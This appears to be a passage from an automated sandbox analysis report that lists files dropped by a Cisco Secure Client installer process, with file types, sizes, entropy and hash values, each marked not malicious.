                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312691
                                                                                                                                                                                                  Entropy (8bit):6.238069670792444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                                                                                  SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                                                                                  SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                                                                                  SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                                                                                  MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                                                                                  SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                                                                                  SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                                                                                  SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                                                                                  MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                                                                                  SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                                                                                  SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                                                                                  SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                                                                                  MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                                                                                  SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                                                                                  SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                                                                                  SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                                                                                  MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                                                                                  SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                                                                                  SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                                                                                  SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
